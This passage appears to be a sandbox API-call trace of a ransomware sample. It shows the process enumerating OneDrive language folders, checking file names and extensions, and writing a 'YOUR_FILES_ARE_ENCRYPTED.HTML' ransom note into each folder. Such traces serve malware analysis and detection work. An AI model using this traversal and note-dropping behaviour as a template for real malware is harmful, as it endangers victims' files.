(lpString=".mui") returned 4 [0161.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.979] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.979] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.980] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.982] CloseHandle (hObject=0x5b8) returned 1 [0161.983] GetProcessHeap () returned 0x270000 [0161.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.983] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nn-no", cAlternateFileName="")) returned 1 [0161.983] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no") returned 77 [0161.983] GetProcessHeap () returned 0x270000 [0161.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.984] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no" [0161.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*" [0161.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.984] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.984] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.984] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.984] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.984] lstrlenW (lpString=".mui") returned 4 [0161.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.984] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa784a1f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa784a1f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.984] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.985] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nn-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.985] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.988] CloseHandle (hObject=0x5b8) returned 1 [0161.989] GetProcessHeap () returned 0x270000 [0161.989] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.989] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nso-za", cAlternateFileName="")) returned 1 [0161.989] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za") returned 78 [0161.989] GetProcessHeap () returned 0x270000 [0161.990] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.990] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za" [0161.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*" [0161.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa784a1f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.990] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\FileSync.LocalizedResources.dll.mui") returned 114 [0161.990] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.990] lstrlenW (lpString=".mui") returned 4 [0161.990] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.990] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7a85690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7a85690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.990] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.991] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0161.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nso-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.991] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.994] CloseHandle (hObject=0x5b8) returned 1 [0161.994] GetProcessHeap () returned 0x270000 [0161.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.996] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad4ad7d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8a1e670, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x6e22a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneDriveSetup.exe", cAlternateFileName="ONEDRI~1.EXE")) returned 1 [0161.996] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\OneDriveSetup.exe") returned 89 [0161.996] lstrcmpW (lpString1="OneDriveSetup.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.996] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0161.996] lstrlenW (lpString=".exe") returned 4 [0161.996] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0161.996] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="or-in", cAlternateFileName="")) returned 1 [0161.996] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in") returned 77 [0161.996] GetProcessHeap () returned 0x270000 [0161.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.996] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in" [0161.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*" [0161.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.996] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7a85690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.997] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.997] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.997] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.997] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.997] lstrlenW (lpString=".mui") returned 4 [0161.997] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.997] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ce6c90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ce6c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.997] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.997] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\or-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.998] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.000] CloseHandle (hObject=0x5b8) returned 1 [0162.001] GetProcessHeap () returned 0x270000 [0162.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa", cAlternateFileName="")) returned 1 [0162.001] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa") returned 74 [0162.001] GetProcessHeap () returned 0x270000 [0162.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.001] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa" [0162.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*" [0162.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ce6c90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.002] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.002] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.002] lstrlenW (lpString=".mui") returned 4 [0162.002] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7f48290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7f48290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.003] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.003] wnsprintfW (in: 